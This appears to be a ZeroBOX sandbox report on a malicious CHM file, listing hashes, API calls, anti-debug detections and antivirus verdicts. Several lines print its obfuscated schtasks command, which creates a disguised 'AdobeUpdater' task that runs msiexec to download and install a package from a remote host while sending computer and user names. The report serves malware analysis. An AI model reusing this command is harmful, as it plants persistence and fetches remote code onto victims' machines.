Summary | ZeroBOX

qwerty.chm

AntiVM AntiDebug CHM Format
Category Machine Started Completed
FILE s1_win7_x6401 Sept. 11, 2023, 6:05 p.m. Sept. 11, 2023, 6:07 p.m.
Size 10.6KB
Type MS Windows HtmlHelp Data
MD5 b556bd47157695e3e0b279d56401026f
SHA256 7829b84b5e415ff682f3ef06b9a80f64be5ef6d1d2508597f9e0998b91114499
CRC32 3E0CDF25
ssdeep 48:Ebo5gfQ0OQRlEFlErlElT5skJxMNvIfVsK0TWI9i1tsBPTAaS0pTNvmDZ9RFdDr5:AlQZJmROp0TWI9wts71TmBFd/
Yara
  • chm_file_format - chm file format

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "AdobeUpdater" has successfully been created.
console_handle: 0x0000000000000007
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0
cmdline schtasks /create /sc minute /mo 15 /tn AdobeUpdater /tr "%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i ht^tp:/^/zha^odaolaj^iankan^g.co^m/ap^ache^/tr^y.php?h=%computername%*%username% /^q^n ^/^norestart" /f
cmdline "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 15 /tn AdobeUpdater /tr "%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i ht^tp:/^/zha^odaolaj^iankan^g.co^m/ap^ache^/tr^y.php?h=%computername%*%username% /^q^n ^/^norestart" /f
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x000007fffff94000
process_handle: 0xffffffffffffffff
1 0 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline schtasks /create /sc minute /mo 15 /tn AdobeUpdater /tr "%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i ht^tp:/^/zha^odaolaj^iankan^g.co^m/ap^ache^/tr^y.php?h=%computername%*%username% /^q^n ^/^norestart" /f
cmdline "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 15 /tn AdobeUpdater /tr "%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i ht^tp:/^/zha^odaolaj^iankan^g.co^m/ap^ache^/tr^y.php?h=%computername%*%username% /^q^n ^/^norestart" /f
cmdline schtasks /create /sc minute /mo 15 /tn AdobeUpdater /tr "%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i ht^tp:/^/zha^odaolaj^iankan^g.co^m/ap^ache^/tr^y.php?h=%computername%*%username% /^q^n ^/^norestart" /f
cmdline "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 15 /tn AdobeUpdater /tr "%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i ht^tp:/^/zha^odaolaj^iankan^g.co^m/ap^ache^/tr^y.php?h=%computername%*%username% /^q^n ^/^norestart" /f
CAT-QuickHeal Trojan.HTML.Bitter.47423
ALYac Generic.Agent.CHM.1.1082BEE1
Sangfor Trojan.Generic-Script.Save.aadd533b
Symantec CL.Downloader!gen150
ESET-NOD32 HTML/TrojanDownloader.Agent.NKU
Kaspersky HEUR:Trojan.Script.Generic
BitDefender Generic.Agent.CHM.1.1082BEE1
MicroWorld-eScan Generic.Agent.CHM.1.1082BEE1
DrWeb Exploit.ActiveX.23
VIPRE Generic.Agent.CHM.1.1082BEE1
FireEye Generic.Agent.CHM.1.1082BEE1
Emsisoft Generic.Agent.CHM.1.1082BEE1 (B)
Arcabit Generic.Agent.CHM.1.1082BEE1
ZoneAlarm HEUR:Trojan.Script.Generic
GData Generic.Agent.CHM.1.1082BEE1
AhnLab-V3 Downloader/HTML.Generic.S2220
MAX malware (ai score=88)
Rising Trojan.MouseJack/HTML!1.BE26 (CLASSIC)
Fortinet HTML/Agent.NKU!tr.dldr
Process injection Process 2580 resumed a thread in remote process 2692
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000280
suspend_count: 1
process_identifier: 2692
1 0 0